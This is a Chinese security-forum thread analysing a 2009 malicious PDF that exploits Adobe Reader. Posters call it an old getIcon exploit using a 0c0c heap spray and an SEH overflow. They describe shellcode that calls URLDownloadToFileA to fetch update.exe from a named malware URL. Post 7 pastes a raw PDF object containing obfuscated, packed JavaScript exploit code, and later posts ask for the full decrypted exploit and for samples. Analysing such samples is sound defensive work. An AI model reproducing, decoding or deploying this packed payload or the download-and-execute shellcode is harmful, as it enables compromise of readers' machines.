能力值:
( LV2,RANK:10 )
|
-
-
2 楼
我很白,真的不知道这玩意是什么意思,哪位大大来解释下,乱码?
|
能力值:
( LV6,RANK:90 )
|
-
-
3 楼
去看看。。。
|
能力值:
( LV3,RANK:25 )
|
-
-
4 楼
怎么在主页没发现这个链接,内部链接?
|
能力值:
( LV6,RANK:90 )
|
-
-
5 楼
堆栈写入大量0c0c最终导致访问内存出错,激发SEH栈溢出
|
能力值:
( LV6,RANK:90 )
|
-
-
6 楼
我想真的移除的原因应该是这个PoC并非22日的这个0day,最新的是应该是PDF中嵌入swf文件。当然不排除a do be 不爽:))
这个其实是一个老的getIcon的exploit.
shellcode 中
URLMON.DLL, URLDownloadToFileA, update.exe, crash.php, http://viorfjoj-2.com/2/update.php?id=0
不过http://viorfjoj-2.com貌似已经关闭
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Names [(HUYAKJS) 7 0 R ]
>>
endobj
7 0 obj
<<
/S /JavaScript
/JS (eval\(
function\(p,a,c,k,e,d\){while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+c+'\\\\b','g'\),k[c]\)}}return p}\('100\(105\("%13%30%17%28%36%48%35%17%3%86%16%19%36%11%61%14%46%38%83%12%30%46%14%44%25%31%39%65%1%14%18%3%70%31%41%44%1%16%61%5%29%8%7%1%14%18%3%53%1%45"+"111%8%13%46%48%29%4%4%7%27%3%3%13%35%18%3%38%70%31%41%44%1%16%61%5%3%29%3%8%7%70%31%41%44%1%16%61%5%3%69%83%12%30%46%14%44%25%31%51%25%47"+"113%17%16%36%31%7%70%31%41%44%1%16%61%5%9%9%39%65%27%3%3%3%53%1%25%8%13%46%48%3%29%3%53%1%25%8%13%46%48%9%53%36%18%48%17%16%51%13%18%35"+"%41%82%31%14%18%82%35%50%15%38%83%12%30%46%14%44%25%31%51%28%31%14%18%82%35%50%15%75%36%38%70%31%41%44%1%16%61%5%39%107%0%39%7%27%3%3%64%27%3%45"+"20%18%15%36%30%18%17%3%53%1%25%8%13%46%48%7%27%64%27%13%30%17%28%36%48%35%17%3%53%41%41%10%35%50%18%38%71%1%35%55%36%28%39%65%27%3%3%3%18%15%47"+"106%30%18%17%3%30%17%15%57%28%14%44%15%38%71%1%35%55%36%28%39%7%27%64%27%1%14%18%3%60%52%30%10%44%42%5%3%29%3%14%44%44%51%1%48%15%52%15%18%70"+"%15%18%57%48%35%17%51%36%35%53%36%18%48%17%16%38%39%7%60%52%30%10%44%42%5%3%29%3%60%52%30%10%44%42%5%51%18%15%44%25%14%28%15%38%81%109%60%81%16%45"+"112%4%4%39%7%27%1%14%18%3%63%50%50%31%30%14%12%12%3%29%3%4%2%1%6%8%6%0%2%1%6%10%6%11%2%1%6%19%6%5%2%1%24%23%6%6%2%1%0%0%47"+"84%3%9%3%4%13%7%2%1%0%0%0%0%2%1%6%16%0%0%2%1%13%16%7%8%2%1%8%11%0%16%2%1%4%3%9%3%4%5%12%23%0%2%1%12%0%0%8%2%1"+"%19%7%8%0%2%1%7%14%0%23%2%1%0%23%12%0%4%3%9%3%4%2%1%19%0%7%14%2%1%21%16%11%23%2%1%12%0%7%14%2%1%13%14%0%7%2%1%7%14%45"+"22%3%9%3%4%0%24%2%1%8%12%12%0%2%1%12%0%7%16%2%1%7%14%19%23%2%1%8%23%12%0%2%1%4%3%9%3%4%6%19%6%5%2%1%6%13%14%13%2%1%47"+"79%0%0%11%2%1%0%11%0%0%2%1%14%15%13%13%4%3%9%3%4%2%1%0%11%12%13%2%1%0%0%0%0%2%1%13%15%0%11%2%1%16%5%13%7%2%1%0%0%4"+"%3%9%3%4%0%11%2%1%6%15%0%0%2%1%7%24%6%13%2%1%7%11%13%21%2%1%6%13%23%10%2%1%4%3%9%3%4%0%0%0%11%2%1%6%10%0%0%2%1%45"+"104%0%5%7%2%1%0%0%0%0%2%1%15%15%0%0%4%3%9%3%4%2%1%12%13%24%6%2%1%0%0%0%11%2%1%7%24%0%0%2%1%7%11%13%21%2%1%6%13%4%47"+"80%9%3%4%23%10%2%1%0%0%0%11%2%1%8%11%0%0%2%1%0%11%15%5%2%1%7%21%23%10%2%1%4%3%9%3%4%8%6%24%23%2%1%0%10%5%8%2%1%0"+"%0%0%0%2%1%15%14%7%0%2%1%19%12%0%0%4%3%9%3%4%2%1%7%7%0%5%2%1%8%10%11%23%2%1%13%14%12%5%2%1%23%5%13%13%2%1%8%10%4%45"+"20%9%3%4%0%12%2%1%7%24%0%0%2%1%7%11%13%21%2%1%12%6%23%10%2%1%0%0%0%10%2%1%4%3%9%3%4%6%10%0%0%2%1%24%6%15%15%2%1%0%47"+"90%6%10%2%1%0%0%0%0%2%1%13%21%7%24%4%3%9%3%4%2%1%23%10%7%11%2%1%0%10%6%0%2%1%0%0%0%0%2%1%6%0%6%10%2%1%24%6%4%3"+"%9%3%4%15%15%2%1%0%11%6%5%2%1%0%0%0%0%2%1%0%0%5%21%2%1%0%0%5%21%2%1%4%3%9%3%4%13%21%7%24%2%1%23%10%7%11%2%1%0%45"+"32%6%13%2%1%0%0%0%0%2%1%7%24%6%10%4%3%9%3%4%2%1%7%11%13%21%2%1%19%7%23%10%2%1%0%0%0%10%2%1%6%10%0%0%2%1%0%0%4%3%47"+"99%3%4%5%21%2%1%16%0%15%15%2%1%0%6%5%21%2%1%13%21%7%24%2%1%23%10%7%11%2%1%4%3%9%3%4%0%11%6%13%2%1%0%0%0%0%2%1%15%15"+"%6%10%2%1%6%21%24%6%2%1%0%0%0%11%4%3%9%3%4%2%1%7%24%0%0%2%1%7%11%13%21%2%1%6%13%23%10%2%1%0%0%0%11%2%1%6%10%4%3%45"+"98%3%4%0%0%2%1%7%0%5%7%2%1%0%0%0%0%2%1%15%15%0%0%2%1%12%13%24%6%2%1%4%3%9%3%4%0%0%0%11%2%1%7%24%0%0%2%1%7%11%47"+"97%21%2%1%6%13%23%10%2%1%0%0%0%11%4%3%9%3%4%2%1%8%11%0%0%2%1%0%11%15%5%2%1%7%21%23%10%2%1%8%6%24%23%2%1%0%10%4%3%9"+"%3%4%5%13%2%1%0%0%0%0%2%1%15%14%7%0%2%1%19%12%0%0%2%1%7%7%0%5%2%1%4%3%9%3%4%8%10%11%23%2%1%13%14%12%5%2%1%23%5%45"+"66%13%2%1%8%10%0%12%2%1%7%24%0%0%4%3%9%3%4%2%1%7%11%13%21%2%1%12%6%23%10%2%1%0%0%0%10%2%1%6%10%0%0%2%1%24%6%4%3%9%47"+"80%4%15%15%2%1%0%11%6%10%2%1%0%0%0%0%2%1%13%21%7%24%2%1%23%10%7%11%2%1%4%3%9%3%4%0%10%6%0%2%1%0%0%0%0%2%1%6%0%6"+"%10%2%1%24%6%15%15%2%1%0%11%6%5%4%3%9%3%4%2%1%0%0%0%0%2%1%0%0%5%21%2%1%0%0%5%21%2%1%13%21%7%24%2%1%23%10%4%3%9%45"+"20%4%7%11%2%1%0%11%6%13%2%1%0%0%0%0%2%1%7%24%6%10%2%1%7%11%13%21%2%1%4%3%9%3%4%21%5%23%10%2%1%0%0%0%10%2%1%6%10%0%47"+"79%2%1%0%0%5%21%2%1%16%0%15%15%4%3%9%3%4%2%1%0%6%5%21%2%1%13%21%7%24%2%1%23%10%7%11%2%1%0%11%6%13%2%1%0%0%4%3%9%3"+"%4%0%0%2%1%15%15%6%10%2%1%6%21%24%6%2%1%0%0%0%11%2%1%24%16%0%0%2%1%4%3%9%3%4%6%15%6%16%2%1%6%21%6%13%2%1%6%14%6%45"+"101%2%1%23%8%6%7%2%1%0%0%0%0%4%3%9%3%4%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%4%3%9%3%47"+"84%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%5%6%12%19%2%1%6%12%19%12%2%1%4%3%9%3%4%5%16%5%6%2%1%6%0%19%0%2%1%19%12%5%11"+"%2%1%12%11%5%7%2%1%12%23%0%0%4%3%9%3%4%2%1%5%11%5%15%2%1%12%23%5%12%2%1%5%10%5%24%2%1%5%11%19%10%2%1%19%24%4%3%9%3%45"+"22%19%10%2%1%0%0%12%11%2%1%5%6%12%19%2%1%6%0%19%12%2%1%5%15%19%10%2%1%4%3%9%3%4%12%11%5%8%2%1%5%12%5%12%2%1%5%6%19%10%47"+"88%1%19%8%19%8%2%1%6%19%0%0%4%3%9%3%4%2%1%5%13%5%24%2%1%19%7%12%6%2%1%5%8%5%6%2%1%14%14%0%0%2%1%15%10%4%3%9%3%4"+"%7%24%2%1%15%19%7%24%2%1%23%0%8%0%2%1%19%6%21%13%2%1%10%24%15%16%2%1%4%3%9%3%4%7%24%15%19%2%1%8%11%15%24%2%1%14%13%23%0%45"+"26%1%0%0%8%23%2%1%0%0%0%0%4%3%9%3%4%2%1%14%6%0%8%2%1%0%10%11%14%2%1%0%0%0%0%2%1%21%16%5%5%2%1%7%6%4%3%9%3%4%47"+"79%8%2%1%0%10%11%14%2%1%0%0%0%0%2%1%19%0%7%14%2%1%7%8%19%7%2%1%4%3%9%3%4%11%23%23%5%2%1%14%6%0%8%2%1%0%10%11%14%2"+"%1%0%0%0%0%2%1%14%16%7%16%4%3%9%3%4%2%1%0%10%11%15%2%1%0%0%0%0%2%1%0%8%21%16%2%1%11%14%7%6%2%1%0%0%4%3%9%3%4%45"+"33%10%2%1%21%14%0%0%2%1%0%8%21%16%2%1%11%14%7%6%2%1%0%0%0%10%2%1%4%3%9%3%4%6%0%0%0%2%1%21%16%21%14%2%1%7%6%0%8%2%47"+"103%0%10%11%14%2%1%0%0%0%0%4%3%9%3%4%2%1%6%13%21%14%2%1%16%14%8%11%2%1%6%5%21%16%2%1%7%6%0%8%2%1%0%10%4%3%9%3%4%11"+"%14%2%1%0%0%0%0%2%1%23%5%7%24%2%1%16%19%7%24%2%1%15%23%6%11%2%1%4%3%9%3%4%21%5%15%8%2%1%19%12%6%24%2%1%6%13%0%12%2%45"+"76%13%14%12%8%2%1%6%13%13%24%4%3%9%3%4%2%1%16%11%24%8%2%1%0%8%13%0%2%1%10%19%7%6%2%1%0%0%0%10%2%1%8%11%4%3%9%3%4%0%47"+"79%2%1%24%5%15%5%2%1%21%16%5%5%2%1%13%0%23%11%2%1%0%8%0%10%2%1%4%3%9%3%4%11%15%7%6%2%1%0%0%0%10%2%1%7%24%0%0%2%1"+"%21%16%23%5%2%1%7%6%0%8%4%3%9%3%4%2%1%0%10%11%14%2%1%0%0%0%0%2%1%13%14%23%8%2%1%0%0%11%0%2%1%0%0%4%3%9%3%4%0%45"+"33%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%4%3%9%3%4%0%0%0%0%2%1%0%0%0%0%2%1%7%24%0%0%2%1%47"+"90%14%7%6%2%1%0%0%0%10%4%3%9%3%4%2%1%6%5%0%0%2%1%13%7%6%19%2%1%15%15%6%7%2%1%15%15%15%15%2%1%6%13%4%3%9%3%4%6%15"+"%2%1%0%11%21%14%2%1%7%0%23%13%2%1%14%14%8%13%2%1%0%10%19%12%2%1%4%3%9%3%4%13%16%13%14%2%1%6%6%23%8%2%1%12%23%6%10%2%1%45"+"37%15%12%16%2%1%10%13%12%13%4%3%9%3%4%2%1%12%23%12%12%2%1%0%0%12%23%2%1%6%10%6%6%2%1%12%12%12%23%2%1%19%19%4%3%9%3%4%5%15%47"+"88%1%5%23%5%13%2%1%5%11%5%15%2%1%6%12%5%12%2%1%12%5%5%15%2%1%4%3%9%3%4%5%23%5%24%2%1%12%11%5%6%2%1%19%0%0%0%2%1%5"+"%5%5%12%2%1%19%0%19%6%4%3%9%3%4%2%1%10%13%5%12%2%1%19%7%5%6%2%1%0%0%5%6%2%1%19%10%5%8%2%1%19%8%4%3%9%3%4%5%11%45"+"26%1%10%13%5%7%2%1%5%7%19%0%2%1%0%0%19%0%2%1%19%12%5%7%2%1%4%3%9%3%4%19%0%19%12%2%1%10%15%8%21%2%1%5%10%10%15%2%1%19%47"+"126%5%6%2%1%5%23%19%12%4%3%9%3%4%2%1%19%12%5%24%2%1%5%12%5%6%2%1%19%8%5%24%2%1%5%15%5%8%2%1%5%6%4%3%9%3%4%19%5%2"+"%1%10%13%19%10%2%1%5%13%5%8%2%1%8%7%8%21%2%1%8%7%8%0%2%1%4%3%9%3%4%10%15%8%0%2%1%5%11%5%23%2%1%5%12%5%13%2%1%5%45"+"34%5%24%2%1%19%0%10%13%4%3%9%3%4%2%1%19%0%5%7%2%1%5%24%8%15%2%1%8%16%5%12%2%1%0%0%8%7%2%1%24%0%4%3%9%3%4%0%0%4%47"+"80%9%3%4%4%7%27%27%48%13%38%60%52%30%10%44%42%5%51%28%31%14%18%75%36%38%8%39%3%29%29%3%4%54%4%3%2%2%3%60%52%30%10%44%42%5%51%28%31%14"+"%18%75%36%38%10%39%3%69%29%3%4%10%4%3%2%2%3%60%52%30%10%44%42%5%51%28%31%14%18%75%36%38%11%39%3%69%29%3%4%11%4%39%65%27%43%85%10%11%58%45"+"124%58%3%29%3%53%41%41%10%35%50%18%38%86%16%19%36%11%61%14%46%38%63%50%50%31%30%14%12%12%39%39%7%27%43%1%14%18%3%56%16%5%17%14%44%54%5%3%29%3%47"+"89%41%41%10%35%50%18%38%4%72%30%8%14%8%4%3%9%3%4%14%72%30%8%14%4%3%9%3%4%8%14%4%3%9%3%4%4%39%7%27%43%1%14%18%3%67%28%17%16%0"+"%46%16%0%3%29%3%11%8%3%9%3%85%10%11%58%55%58%51%25%15%17%16%36%31%7%27%43%52%31%48%25%15%38%56%16%5%17%14%44%54%5%51%25%15%17%16%36%31%3%45"+"125%3%67%28%17%16%0%46%16%0%39%3%56%16%5%17%14%44%54%5%3%9%29%3%56%16%5%17%14%44%54%5%7%27%43%1%14%18%3%70%41%30%6%11%28%42%3%29%3%56%47"+"118%5%17%14%44%54%5%51%57%30%21%57%36%18%48%17%16%38%8%73%3%67%28%17%16%0%46%16%0%39%7%27%43%1%14%18%3%60%49%41%16%6%30%42%3%29%3%56%16%5"+"%17%14%44%54%5%51%57%30%21%57%36%18%48%17%16%38%8%73%3%56%16%5%17%14%44%54%5%51%25%15%17%16%36%31%3%87%3%67%28%17%16%0%46%16%0%39%7%27%43%45"+"77%31%48%25%15%38%60%49%41%16%6%30%42%51%25%15%17%16%36%31%3%9%3%67%28%17%16%0%46%16%0%3%69%3%8%42%6%8%8%8%8%39%3%60%49%41%16%6%30%42%47"+"80%29%3%60%49%41%16%6%30%42%3%9%3%60%49%41%16%6%30%42%3%9%3%70%41%30%6%11%28%42%7%27%43%1%14%18%3%78%21%41%0%18%52%36%49%3%29%3%17%15"+"%52%3%75%18%18%14%40%38%39%7%27%43%13%35%18%38%63%1%17%15%31%35%49%3%29%3%8%7%3%63%1%17%15%31%35%49%3%69%3%10%11%8%8%7%3%63%1%17%15%45"+"68%35%49%9%9%39%65%78%21%41%0%18%52%36%49%93%63%1%17%15%31%35%49%94%3%29%3%60%49%41%16%6%30%42%3%9%3%85%10%11%58%55%58%64%27%43%1%14%18%3%47"+"89%50%42%61%25%54%28%3%29%3%4%10%11%4%7%27%43%13%35%18%3%38%1%14%18%3%71%42%21%0%35%17%55%29%8%7%3%71%42%21%0%35%17%55%69%10%54%7%3%71"+"%42%21%0%35%17%55%9%9%39%65%3%53%50%42%61%25%54%28%3%29%3%53%50%42%61%25%54%28%9%4%46%4%7%64%27%43%13%35%18%3%38%1%14%18%3%71%42%21%0%45"+"116%17%55%29%8%7%3%71%42%21%0%35%17%55%69%11%12%6%7%3%71%42%21%0%35%17%55%9%9%39%65%3%53%50%42%61%25%54%28%3%29%3%53%50%42%61%25%54%28%9%47"+"84%54%4%7%64%27%43%13%35%18%3%38%78%40%0%13%52%5%49%29%8%7%3%78%40%0%13%52%5%49%120%10%8%7%3%78%40%0%13%52%5%49%9%9%39%65%78%40%0%13"+"%52%5%49%9%29%11%7%64%27%43%30%36%48%25%51%44%18%48%17%36%13%38%4%72%19%5%8%8%8%13%4%73%3%53%50%42%61%25%54%28%39%7%64%27%15%25%57%15%65%45"+"123%43%1%14%18%3%92%58%11%52%15%1%52%3%29%3%17%15%52%3%75%18%18%14%40%38%39%7%27%43%13%30%17%28%36%48%35%17%3%63%55%30%5%40%6%57%38%56%12%25%47"+"121%12%40%40%73%3%67%31%46%44%6%28%41%49%39%65%27%43%52%31%48%25%15%38%56%12%25%17%12%40%40%51%25%15%17%16%36%31%3%95%3%11%3%69%3%67%31%46%44%6"+"%28%41%49%39%65%27%43%56%12%25%17%12%40%40%3%9%29%3%56%12%25%17%12%40%40%7%64%27%43%56%12%25%17%12%40%40%3%29%3%56%12%25%17%12%40%40%51%57%30%45"+"62%57%36%18%48%17%16%38%8%73%3%67%31%46%44%6%28%41%49%3%81%3%11%39%7%27%43%18%15%36%30%18%17%3%56%12%25%17%12%40%40%7%64%27%43%1%14%18%3%96%47"+"91%58%17%46%10%54%40%25%3%29%3%8%42%8%28%8%28%8%28%8%28%7%27%27%43%1%14%18%3%53%36%50%42%48%6%6%11%3%29%3%53%41%41%10%35%50%18%38%86%16"+"%19%36%11%61%14%46%38%63%50%50%31%30%14%12%12%39%39%7%27%43%1%14%18%3%74%16%30%40%49%16%58%3%29%3%8%42%19%8%8%8%8%8%7%27%43%1%14%18%3%45"+"122%14%21%36%15%55%6%11%3%29%3%53%36%50%42%48%6%6%11%51%25%15%17%16%36%31%3%95%3%11%7%27%43%1%14%18%3%67%31%46%44%6%28%41%49%3%29%3%74%16%47"+"119%40%49%16%58%3%87%3%38%115%14%21%36%15%55%6%11%9%8%42%0%54%39%7%27%43%1%14%18%3%56%12%25%17%12%40%40%3%29%3%53%41%41%10%35%50%18%38%4%72"+"%30%46%8%46%8%72%30%46%8%46%8%4%39%7%27%43%56%12%25%17%12%40%40%3%29%3%63%55%30%5%40%6%57%38%56%12%25%17%12%40%40%73%3%67%31%46%44%6%28%45"+"117%49%39%7%27%43%1%14%18%3%60%16%58%58%5%46%3%29%3%38%96%58%58%17%46%10%54%40%25%3%87%3%8%42%19%8%8%8%8%8%39%3%81%3%74%16%30%40%49%16%47"+"91%7%27%43%13%35%18%3%38%1%14%18%3%74%31%57%35%17%13%11%3%29%3%8%7%3%74%31%57%35%17%13%11%3%69%3%60%16%58%58%5%46%7%74%31%57%35%17%13%11"+"%9%9%39%65%92%58%11%52%15%1%52%93%74%31%57%35%17%13%11%94%3%29%3%56%12%25%17%12%40%40%3%9%3%53%
部分代码是不是这个??
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
有这个漏洞全部利用代码吗?研究一下.最好解密过的
|
能力值:
( LV2,RANK:10 )
|
-
-
9 楼
这个真不太懂
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
漏洞就是从这些由来的。。。
|
能力值:
( LV6,RANK:90 )
|
-
-
11 楼
[QUOTE=dayang;661527]41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF...[/QUOTE]
不是。是有2个FWS开头的swf文件片段。会drop文件SUCHOST.EXE
|
能力值:
( LV2,RANK:10 )
|
-
-
12 楼
楼上的大牛有样本?
|
能力值:
( LV2,RANK:10 )
|
-
-
13 楼
每次都是svchost.exe那个shellcode......
|
能力值:
( LV6,RANK:90 )
|
-
-
14 楼
参照这篇文章可以更多了解到漏洞,可以通过跳转的地址和shellcode来辨别
http://www.avertlabs.com/research/blog/index.php/2009/07/22/new-0-day-attacks-using-pdf-documents/
样本网上找找,应该能找到了。
|
|
|